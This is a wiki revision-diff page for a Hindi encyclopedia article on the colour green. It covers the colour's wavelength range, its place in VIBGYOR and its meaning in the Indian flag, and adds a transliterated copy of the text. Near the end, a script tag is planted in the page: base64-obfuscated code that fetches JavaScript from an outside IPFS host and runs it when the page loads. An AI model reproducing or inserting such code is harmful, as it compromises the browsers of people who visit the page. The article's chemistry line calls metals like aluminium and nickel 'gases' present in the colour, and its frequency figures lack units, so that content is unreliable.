Difference between revisions of "हरा रंग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - "ते है।" to "ते हैं।")
Line 1: Line 1:
*[[रंग|रंगो]] का हमारे जीवन में बहुत महत्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते है। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
+
*[[रंग|रंगो]] का हमारे जीवन में बहुत महत्व है। रंगो से हमें विभिन्न स्थितियों का पता चलता है। हम अपने चारों तरफ अनेक प्रकार के रंगो से प्रभावित होते हैं। रंग, मानवी आँखों के [[वर्णक्रम]] से मिलने पर छाया सम्बंधी गतिविधियों से उत्पन्न होते हैं।
 
*हरा एक [[प्राथमिक रंग]] है। इसकी [[आवृति]] 5.19 - 6.01 तथा [[तरंगदैर्ध्य]] विस्तार 5000 Å से 5780 Å<ref>(Å=10<sup>-10</sup> m = 10<sup>-8</sup> cm = 10<sup>-1</sup>nm (nanometre)</ref> है।  
 
*हरा एक [[प्राथमिक रंग]] है। इसकी [[आवृति]] 5.19 - 6.01 तथा [[तरंगदैर्ध्य]] विस्तार 5000 Å से 5780 Å<ref>(Å=10<sup>-10</sup> m = 10<sup>-8</sup> cm = 10<sup>-1</sup>nm (nanometre)</ref> है।  
 
*हरा रंग VIBGYOR का चौथा रंग है।
 
*हरा रंग VIBGYOR का चौथा रंग है।

Revision as of 08:45, 20 February 2011

  • rango ka hamare jivan mean bahut mahatv hai. rango se hamean vibhinn sthitiyoan ka pata chalata hai. ham apane charoan taraph anek prakar ke rango se prabhavit hote haian. rang, manavi aankhoan ke varnakram se milane par chhaya sambandhi gatividhiyoan se utpann hote haian.
  • hara ek prathamik rang hai. isaki avriti 5.19 - 6.01 tatha tarangadairdhy vistar 5000 Å se 5780 Å[1] hai.
  • hara rang VIBGYOR ka chautha rang hai.
rang avriti vistar tarangadairdhy vistar
hara 5.19 - 6.01 5000 Å se 5780 Å

tirange mean hare rang ka mahatv

thumb|tiranga rashtriy dhvaj tirange mean hara rang ko manyata di gayi hai. hara rang prakriti se sanbandh aur sanpannata darshata hai .

rasayan

hare rang mean aauksijan, elyoominiyam, kromiyam, sodiyam, kailshiyam, nikil adi gaisean upasthit hoti haian.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. (Å=10-10 m = 10-8 cm = 10-1nm (nanometre)

sanbandhit lekh